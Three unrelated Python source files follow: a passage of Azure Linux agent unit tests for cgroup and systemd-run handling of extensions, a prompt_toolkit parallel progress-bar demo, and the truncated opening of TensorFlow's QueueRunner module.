# get the paths to the mocked files
azure_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.azure)
extensions_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.vmextensions)
agent_drop_in_file_slice = configurator.mocks.get_mapped_path(UnitFilePaths.slice)
agent_drop_in_file_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_accounting)
# The mock creates the service and slice unit files; replace the former and delete the latter
configurator.mocks.add_data_file(os.path.join(data_dir, 'init', "walinuxagent.service.previous"), UnitFilePaths.walinuxagent)
os.remove(azure_slice_unit_file)
os.remove(extensions_slice_unit_file)
configurator.initialize()
# The older service file for the agent did not include settings for the slice and cpu parameters; in that case, initialize() should
# create drop in files to set those properties
self.assertTrue(os.path.exists(azure_slice_unit_file), "{0} was not created".format(azure_slice_unit_file))
self.assertTrue(os.path.exists(extensions_slice_unit_file), "{0} was not created".format(extensions_slice_unit_file))
self.assertTrue(os.path.exists(agent_drop_in_file_slice), "{0} was not created".format(agent_drop_in_file_slice))
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_accounting), "{0} was not created".format(agent_drop_in_file_cpu_accounting))
def test_setup_extension_slice_should_create_unit_files(self):
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.extensionslice)
configurator.setup_extension_slice(extension_name="Microsoft.CPlat.Extension")
expected_cpu_accounting = "CPUAccounting=yes"
self.assertTrue(os.path.exists(extension_slice_unit_file), "{0} was not created".format(extension_slice_unit_file))
self.assertTrue(fileutil.findre_in_file(extension_slice_unit_file, expected_cpu_accounting),
"CPUAccounting was not set correctly. Expected: {0}. Got:\n{1}".format(expected_cpu_accounting, fileutil.read_file(
extension_slice_unit_file)))
def test_remove_extension_slice_should_remove_unit_files(self):
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.return_value = True
# get the paths to the mocked files
extension_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.extensionslice)
CGroupsTelemetry._tracked['/sys/fs/cgroup/cpu,cpuacct/azure.slice/azure-vmextensions.slice/' \
'azure-vmextensions-Microsoft.CPlat.Extension.slice'] = \
CpuCgroup('Microsoft.CPlat.Extension',
'/sys/fs/cgroup/cpu,cpuacct/azure.slice/azure-vmextensions.slice/azure-vmextensions-Microsoft.CPlat.Extension.slice')
configurator.remove_extension_slice(extension_name="Microsoft.CPlat.Extension")
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'Microsoft.CPlat.Extension' and 'cpu' in cg.path),
"The extension's CPU is being tracked")
self.assertFalse(os.path.exists(extension_slice_unit_file), "{0} should not be present".format(extension_slice_unit_file))
def test_enable_should_raise_cgroups_exception_when_cgroups_are_not_supported(self):
with self._get_cgroup_configurator(enable=False) as configurator:
with patch.object(configurator, "supported", return_value=False):
with self.assertRaises(CGroupsException) as context_manager:
configurator.enable()
self.assertIn("Attempted to enable cgroups, but they are not supported on the current platform", str(context_manager.exception))
def test_enable_should_set_agent_cpu_quota_and_track_throttled_time(self):
with self._get_cgroup_configurator(enable=False) as configurator:
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
if os.path.exists(agent_drop_in_file_cpu_quota):
raise Exception("{0} should not have been created during test setup".format(agent_drop_in_file_cpu_quota))
configurator.enable()
expected_quota = "CPUQuota={0}%".format(conf.get_agent_cpu_quota())
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_quota), "{0} was not created".format(agent_drop_in_file_cpu_quota))
self.assertTrue(
fileutil.findre_in_file(agent_drop_in_file_cpu_quota, expected_quota),
"CPUQuota was not set correctly. Expected: {0}. Got:\n{1}".format(expected_quota, fileutil.read_file(agent_drop_in_file_cpu_quota)))
self.assertTrue(CGroupsTelemetry.get_track_throttled_time(), "Throttle time should be tracked")
def test_enable_should_not_track_throttled_time_when_setting_the_cpu_quota_fails(self):
with self._get_cgroup_configurator(enable=False) as configurator:
if CGroupsTelemetry.get_track_throttled_time():
raise Exception("Test setup should not start tracking Throttle Time")
configurator.mocks.add_file(UnitFilePaths.cpu_quota, Exception("A TEST EXCEPTION"))
configurator.enable()
self.assertFalse(CGroupsTelemetry.get_track_throttled_time(), "Throttle time should not be tracked")
def test_disable_should_reset_cpu_quota_and_tracked_cgroups(self):
with self._get_cgroup_configurator() as configurator:
if len(CGroupsTelemetry._tracked) == 0:
raise Exception("Test setup should have started tracking at least 1 cgroup (the agent's)")
if not CGroupsTelemetry._track_throttled_time:
raise Exception("Test setup should have started tracking Throttle Time")
configurator.disable("UNIT TEST", DisableCgroups.AGENT)
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_quota), "{0} was not created".format(agent_drop_in_file_cpu_quota))
self.assertTrue(
fileutil.findre_in_file(agent_drop_in_file_cpu_quota, "^CPUQuota=$"),
"CPUQuota was not set correctly. Expected an empty value. Got:\n{0}".format(fileutil.read_file(agent_drop_in_file_cpu_quota)))
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should be tracked after disable. Tracking: {0}".format(CGroupsTelemetry._tracked))
self.assertFalse(CGroupsTelemetry._track_throttled_time, "Throttle Time should not be tracked after disable")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_systemd_when_cgroups_are_not_enabled(self, _):
with self._get_cgroup_configurator() as configurator:
configurator.disable("UNIT TEST", DisableCgroups.ALL)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as patcher:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for args, _ in patcher.call_args_list if len(args) > 0 and "date" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertNotIn("systemd-run", command_calls[0], "The command should not have been invoked using systemd")
self.assertEqual(command_calls[0], "date", "The command line should not have been modified")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_use_systemd_run_when_cgroups_are_enabled(self, _):
with self._get_cgroup_configurator() as configurator:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="the-test-extension-command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for (args, _) in popen_patch.call_args_list if "the-test-extension-command" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertIn("systemd-run", command_calls[0], "The extension should have been invoked using systemd")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_start_tracking_the_extension_cgroups(self, _):
# CPU usage is initialized when we begin tracking a CPU cgroup; since this test does not retrieve the
# CPU usage, there is no need for initialization
with self._get_cgroup_configurator() as configurator:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'cpu' in cg.path),
"The extension's CPU is not being tracked")
def test_start_extension_command_should_raise_an_exception_when_the_command_cannot_be_started(self):
with self._get_cgroup_configurator() as configurator:
original_popen = subprocess.Popen
def mock_popen(command_arg, *args, **kwargs):
if "test command" in command_arg:
raise Exception("A TEST EXCEPTION")
return original_popen(command_arg, *args, **kwargs)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with self.assertRaises(Exception) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertIn("A TEST EXCEPTION", str(context_manager.exception))
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_disable_cgroups_and_invoke_the_command_directly_if_systemd_fails(self, _):
with self._get_cgroup_configurator() as configurator:
original_popen = subprocess.Popen
def mock_popen(command, *args, **kwargs):
if 'systemd-run' in command:
# Inject a syntax error to the call
command = command.replace('systemd-run', 'systemd-run syntax_error')
return original_popen(command, *args, **kwargs)
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as output_file:
with patch("azurelinuxagent.common.cgroupconfigurator.add_event") as mock_add_event:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen) as popen_patch:
CGroupsTelemetry.reset()
command = "echo TEST_OUTPUT"
command_output = configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=output_file,
stderr=output_file)
self.assertFalse(configurator.enabled(), "Cgroups should have been disabled")
disabled_events = [kwargs for _, kwargs in mock_add_event.call_args_list if kwargs['op'] == WALAEventOperation.CGroupsDisabled]
self.assertTrue(len(disabled_events) == 1, "Exactly one CGroupsDisabled telemetry event should have been issued. Found: {0}".format(disabled_events))
self.assertIn("Failed to start Microsoft.Compute.TestExtension-1.2.3 using systemd-run",
disabled_events[0]['message'],
"The systemd-run failure was not included in the telemetry message")
self.assertEqual(False, disabled_events[0]['is_success'], "The telemetry event should indicate a failure")
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if command in args[0]]
self.assertEqual(2, len(extension_calls), "The extension should have been invoked exactly twice")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(command, extension_calls[1],
"The second call to the extension should not have used systemd")
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should have been created")
self.assertIn("TEST_OUTPUT\n", command_output, "The test output was not captured")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_disable_cgroups_and_invoke_the_command_directly_if_systemd_times_out(self, _):
with self._get_cgroup_configurator() as configurator:
# Systemd has its own internal timeout which is shorter than what we define for extension operation timeout.
# When systemd times out, it will write a message to stderr and exit with exit code 1.
# In that case, we will internally recognize the failure due to the non-zero exit code, not as a timeout.
configurator.mocks.add_command(MockCommand("systemd-run", return_value=1, stdout='', stderr='Failed to start transient scope unit: Connection timed out'))
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
CGroupsTelemetry.reset()
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="echo 'success'",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertFalse(configurator.enabled(), "Cgroups should have been disabled")
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if "echo 'success'" in args[0]]
self.assertEqual(2, len(extension_calls), "The extension should have been called twice. Got: {0}".format(extension_calls))
self.assertIn("systemd-run", extension_calls[0], "The first call to the extension should have used systemd")
self.assertNotIn("systemd-run", extension_calls[1], "The second call to the extension should not have used systemd")
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should have been created")
@attr('requires_sudo')
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_fallback_option_if_extension_fails(self, *args):
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict with the mock Popen below
command = "ls folder_does_not_exist"
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if command in args[0]]
self.assertEqual(1, len(extension_calls), "The extension should have been invoked exactly once")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginUnknownFailure)
self.assertIn("Non-zero exit code", ustr(context_manager.exception))
# The scope name should appear in the process output since systemd-run was invoked and stderr
# wasn't truncated.
self.assertIn("Running scope as unit", ustr(context_manager.exception))
@attr('requires_sudo')
@patch('time.sleep', side_effect=lambda _: mock_sleep())
@patch("azurelinuxagent.common.utils.extensionprocessutil.TELEMETRY_MESSAGE_MAX_LEN", 5)
def test_start_extension_command_should_not_use_fallback_option_if_extension_fails_with_long_output(self, *args):
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict with the mock Popen below
long_output = "a"*20 # large enough to ensure both stdout and stderr are truncated
long_stdout_stderr_command = "echo {0} && echo {0} >&2 && ls folder_does_not_exist".format(long_output)
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=long_stdout_stderr_command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if long_stdout_stderr_command in args[0]]
self.assertEqual(1, len(extension_calls), "The extension should have been invoked exactly once")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginUnknownFailure)
self.assertIn("Non-zero exit code", ustr(context_manager.exception))
# stdout and stderr should have been truncated, so the scope name doesn't appear in stderr
# even though systemd-run ran
self.assertNotIn("Running scope as unit", ustr(context_manager.exception))
@attr('requires_sudo')
def test_start_extension_command_should_not_use_fallback_option_if_extension_times_out(self, *args): # pylint: disable=unused-argument
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict with the mock Popen below
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.utils.extensionprocessutil.wait_for_process_completion_or_timeout",
return_value=[True, None]):
with patch("azurelinuxagent.common.cgroupapi.SystemdCgroupsApi._is_systemd_failure",
return_value=False):
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginHandlerScriptTimedout)
self.assertIn("Timeout", ustr(context_manager.exception))
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_capture_only_the_last_subprocess_output(self, _):
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict with the mock Popen below
original_popen = subprocess.Popen
def mock_popen(command, *args, **kwargs):
# Inject a syntax error to the call
systemd_command = command.replace('systemd-run', 'systemd-run syntax_error')
return original_popen(systemd_command, *args, **kwargs)
expected_output = "[stdout]\n{0}\n\n\n[stderr]\n"
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
# We expect this call to fail because of the syntax error
process_output = configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="echo 'very specific test message'",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertEqual(expected_output.format("very specific test message"), process_output)
def test_it_should_set_extension_services_cpu_memory_quota(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system"
}
]
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_accounting)
configurator.set_extension_services_cpu_memory_quota(service_list)
expected_cpu_accounting = "CPUAccounting=yes"
# create drop in files to set those properties
self.assertTrue(os.path.exists(extension_service_cpu_accounting), "{0} was not created".format(extension_service_cpu_accounting))
self.assertTrue(
fileutil.findre_in_file(extension_service_cpu_accounting, expected_cpu_accounting),
"CPUAccounting was not enabled. Expected: {0}. Got:\n{1}".format(expected_cpu_accounting, fileutil.read_file(extension_service_cpu_accounting)))
def test_it_should_set_extension_services_when_quotas_not_defined(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_accounting)
extension_service_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.extension_service_cpu_quota)
configurator.set_extension_services_cpu_memory_quota(service_list)
self.assertTrue(os.path.exists(extension_service_cpu_accounting),
"{0} was not created".format(extension_service_cpu_accounting))
self.assertFalse(os.path.exists(extension_service_cpu_quota),
"{0} should not have been created during setup".format(extension_service_cpu_quota))
def test_it_should_start_tracking_extension_services_cgroups(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
configurator.start_tracking_extension_services_cgroups(service_list)
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is not being tracked")
def test_it_should_stop_tracking_extension_services_cgroups(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.return_value = True
CGroupsTelemetry.track_cgroup(CpuCgroup('extension.service', '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service'))
configurator.stop_tracking_extension_services_cgroups(service_list)
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is being tracked")
def test_it_should_remove_extension_services_drop_in_files(self):
service_list = [
{
"name": "extension.service",
"path": "/lib/systemd/system",
}
]
with self._get_cgroup_configurator() as configurator:
extension_service_cpu_accounting = configurator.mocks.get_mapped_path(
UnitFilePaths.extension_service_cpu_accounting)
configurator.remove_extension_services_drop_in_files(service_list)
self.assertFalse(os.path.exists(extension_service_cpu_accounting),
"{0} should not have been created".format(extension_service_cpu_accounting))
def test_it_should_start_tracking_unit_cgroups(self):
with self._get_cgroup_configurator() as configurator:
configurator.start_tracking_unit_cgroups("extension.service")
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is not being tracked")
def test_it_should_stop_tracking_unit_cgroups(self):
def side_effect(path):
if path == '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service':
return True
return False
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.side_effect = side_effect
CGroupsTelemetry._tracked['/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service'] = \
CpuCgroup('extension.service', '/sys/fs/cgroup/cpu,cpuacct/system.slice/extension.service')
configurator.stop_tracking_unit_cgroups("extension.service")
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'extension.service' and 'cpu' in cg.path),
"The extension service's CPU is being tracked")
def test_check_processes_in_agent_cgroup_should_raise_a_cgroups_exception_when_there_are_unexpected_processes_in_the_agent_cgroup(self):
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict with the mock Popen below
# The test script recursively creates a given number of descendant processes, then it blocks until the
# 'stop_file' exists. It produces an output file containing the PID of each descendant process.
test_script = os.path.join(self.tmp_dir, "create_processes.sh")
stop_file = os.path.join(self.tmp_dir, "create_processes.stop")
AgentTestCase.create_script(test_script, """
#!/usr/bin/env bash
set -euo pipefail
if [[ $# != 2 ]]; then
echo "Usage: $0 <output_file> <count>"
exit 1
fi
echo $$ >> $1
if [[ $2 > 1 ]]; then
$0 $1 $(($2 - 1))
else
timeout 30s /usr/bin/env bash -c "while ! [[ -f {0} ]]; do sleep 0.25s; done"
fi
exit 0
""".format(stop_file))
number_of_descendants = 3
def wait_for_processes(processes_file):
def _all_present():
if os.path.exists(processes_file):
with open(processes_file, "r") as file_stream:
_all_present.processes = [int(process) for process in file_stream.read().split()]
return len(_all_present.processes) >= number_of_descendants
_all_present.processes = []
if not wait_for(_all_present):
raise Exception("Timeout waiting for processes. Expected {0}; got: {1}".format(
number_of_descendants, format_processes(_all_present.processes)))
return _all_present.processes
threads = []
try:
#
# Start the processes that will be used by the test. We use two sets of processes: the first set simulates a command executed by the agent
# (e.g. iptables) and its child processes, if any. The second set of processes simulates an extension.
#
agent_command_output = os.path.join(self.tmp_dir, "agent_command.pids")
agent_command = threading.Thread(target=lambda: shellutil.run_command([test_script, agent_command_output, str(number_of_descendants)]))
agent_command.start()
threads.append(agent_command)
agent_command_processes = wait_for_processes(agent_command_output)
extension_output = os.path.join(self.tmp_dir, "extension.pids")
def start_extension():
original_sleep = time.sleep
original_popen = subprocess.Popen
# Extensions are started using systemd-run; mock Popen to remove the call to systemd-run; the test script creates a couple of
# child processes, which would simulate the extension's processes.
def mock_popen(command, *args, **kwargs):
match = re.match(r"^systemd-run --unit=[^\s]+ --scope --slice=[^\s]+ (.+)", command)
is_systemd_run = match is not None
if is_systemd_run:
command = match.group(1)
process = original_popen(command, *args, **kwargs)
if is_systemd_run:
start_extension.systemd_run_pid = process.pid
return process
with patch('time.sleep', side_effect=lambda _: original_sleep(0.1)): # start_extension_command has a small delay; skip it
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
configurator.start_extension_command(
extension_name="TestExtension",
command="{0} {1} {2}".format(test_script, extension_output, number_of_descendants),
cmd_name="test",
timeout=30,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
start_extension.systemd_run_pid = None
extension = threading.Thread(target=start_extension)
extension.start()
threads.append(extension)
extension_processes = wait_for_processes(extension_output)
#
# check_processes_in_agent_cgroup uses shellutil and the cgroups api to get the commands that are currently running;
# wait for all the processes to show up
#
if not wait_for(lambda: len(shellutil.get_running_commands()) > 0 and len(configurator._cgroups_api.get_systemd_run_commands()) > 0):
raise Exception("Timeout while attempting to track the child commands")
#
# Verify that check_processes_in_agent_cgroup raises when there are unexpected processes in the agent's cgroup.
#
# For the agent's processes, we use the current process and its parent (in the actual agent these would be the daemon and the extension
# handler), and the commands started by the agent.
#
# For other processes, we use process 1, a process that already completed, and an extension. Note that extensions are started using
# systemd-run and the process for that command belongs to the agent's cgroup, but the processes for the extension should be in a
# different cgroup
#
def get_completed_process():
random.seed()
completed = random.randint(1000, 10000)
while os.path.exists("/proc/{0}".format(completed)): # ensure we do not use an existing process
completed = random.randint(1000, 10000)
return completed
agent_processes = [os.getppid(), os.getpid()] + agent_command_processes + [start_extension.systemd_run_pid]
other_processes = [1, get_completed_process()] + extension_processes
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes + other_processes):
with self.assertRaises(CGroupsException) as context_manager:
configurator._check_processes_in_agent_cgroup()
# The list of processes in the message is an array of strings: "['foo', ..., 'bar']"
message = ustr(context_manager.exception)
search = re.search(r'unexpected processes: \[(?P<processes>.+)\]', message)
self.assertIsNotNone(search, "The event message is not in the expected format: {0}".format(message))
reported = search.group('processes').split(',')
self.assertEqual(
len(other_processes), len(reported),
"An incorrect number of processes was reported. Expected: {0} Got: {1}".format(format_processes(other_processes), reported))
for pid in other_processes:
self.assertTrue(
any("[PID: {0}]".format(pid) in reported_process for reported_process in reported),
"Process {0} was not reported. Got: {1}".format(format_processes([pid]), reported))
finally:
# create the file that stops the test processes and wait for them to complete
open(stop_file, "w").close()
for thread in threads:
thread.join(timeout=5)
def test_check_agent_throttled_time_should_raise_a_cgroups_exception_when_the_threshold_is_exceeded(self):
metrics = [MetricValue(MetricsCategory.CPU_CATEGORY, MetricsCounter.THROTTLED_TIME, AGENT_NAME_TELEMETRY, _AGENT_THROTTLED_TIME_THRESHOLD + 1)]
with self.assertRaises(CGroupsException) as context_manager:
CGroupConfigurator._Impl._check_agent_throttled_time(metrics)
self.assertIn("The agent has been throttled", ustr(context_manager.exception), "An incorrect exception was raised")
def test_check_cgroups_should_disable_cgroups_when_a_check_fails(self):
with self._get_cgroup_configurator() as configurator:
checks = ["_check_processes_in_agent_cgroup", "_check_agent_throttled_time"]
for method_to_fail in checks:
patchers = []
try:
# mock 'method_to_fail' to raise an exception and the rest to do nothing
for method_to_mock in checks:
side_effect = CGroupsException(method_to_fail) if method_to_mock == method_to_fail else lambda *_: None
p = patch.object(configurator, method_to_mock, side_effect=side_effect)
patchers.append(p)
p.start()
with patch("azurelinuxagent.common.cgroupconfigurator.add_event") as add_event:
configurator.enable()
configurator.check_cgroups([])
if method_to_fail == "_check_processes_in_agent_cgroup":
self.assertFalse(configurator.enabled(), "An error in {0} should have disabled cgroups".format(method_to_fail))
else:
self.assertFalse(configurator.agent_enabled(), "An error in {0} should have disabled cgroups".format(method_to_fail))
disable_events = [kwargs for _, kwargs in add_event.call_args_list if kwargs["op"] == WALAEventOperation.CGroupsDisabled]
self.assertTrue(
len(disable_events) == 1,
"Exactly 1 event should have been emitted when {0} fails. Got: {1}".format(method_to_fail, disable_events))
self.assertIn(
"[CGroupsException] {0}".format(method_to_fail),
disable_events[0]["message"],
"The error message is not correct when {0} failed".format(method_to_fail))
finally:
for p in patchers:
p.stop()
|
a-lot-of-parallel-tasks.py
|
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
import random
import threading
import time
from prompt_toolkit_dev import HTML
from prompt_toolkit_dev.shortcuts import ProgressBar
def main():
with ProgressBar(
title=HTML('<b>Example of many parallel tasks.</b>'),
bottom_toolbar=HTML('<b>[Control-L]</b> clear <b>[Control-C]</b> abort')) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = []
for i in range(160):
label = 'Task %i' % i
total = random.randrange(50, 200)
sleep_time = random.randrange(5, 20) / 100.
threads.append(threading.Thread(target=run_task, args=(label, total, sleep_time)))
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=.5)
if __name__ == '__main__':
main()
|
queue_runner.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import tensorflow.python.platform
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import logging
class QueueRunner(object):
"""Holds a list of enqueue operations for a queue, each to be run in a thread.
Queues are a convenient TensorFlow mechanism to compute tensors
asynchronously using multiple threads. For example in the canonical 'Input
Reader' setup one set of threads generates filenames in a queue; a second set
of threads reads records from the files, processes them, and enqueues tensors
on a second queue; a third set of threads dequeues these input records to
construct batches and runs them through training operations.
There are several delicate issues when running multiple threads that way:
closing the queues in sequence as the input is exhausted, correctly catching
and reporting exceptions, etc.
The `QueueRunner`, combined with the `Coordinator`, helps handle these issues.
"""
def __init__(self, queue, enqueue_ops):
"""Create a QueueRunner.
On construction the `QueueRunner` adds an op to close the queue. That op
will be run if the enqueue ops raise exceptions.
When you later call the `create_threads()` method, the `QueueRunner` will
create one thread for each op in `enqueue_ops`. Each thread will run its
enqueue op in parallel with the other threads. The enqueue ops do not have
to all be the same op, but it is expected that they all enqueue tensors in
`queue`.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
"""
self._queue = queue
self._enqueue_ops = enqueue_ops
# Close when no more will be produced, but pending enqueues should be
# preserved.
self._close_op = self._queue.close()
# Close and cancel pending enqueues since there was an error and we want
